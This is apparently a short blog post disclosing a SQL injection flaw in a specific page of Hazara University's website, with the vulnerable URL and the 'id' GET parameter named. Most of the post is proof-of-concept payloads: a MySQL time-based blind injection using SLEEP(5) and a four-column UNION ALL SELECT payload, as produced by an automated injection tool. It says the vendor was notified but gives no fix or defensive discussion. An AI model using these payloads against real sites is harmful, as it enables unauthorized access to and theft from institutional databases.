www.hu.edu.pk – Sql Vulnerability

Pakistan FO to seek ISI help against cyber attacks
May 16, 2016
http://www.aiou.edu.pk – sql vulnerability
July 26, 2016

www.hu.edu.pk – Sql Vulnerability

Hazara university

website : www.hu.edu.pk/oldwebsitehu/webtest/view_deg_prog.php?id=1

Vuln type : Sql Injection

Submitted by : Waqas Haider

POC :

Vuln-Parameter: id (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: id=1 AND SLEEP(5)

Title: Generic UNION query (NULL) – 4 columns

Payload: id=1 UNION ALL SELECT

NULL,CONCAT(0x7178706b71,0x796a6a65696172416b5a596250664269416a636a474d6a

484e57674f76455052517452796d744c74,0x71706b6a71),NULL,NULL– FAic

Type: UNION query

 

Notification : Vendor Notified

 

Leave a Reply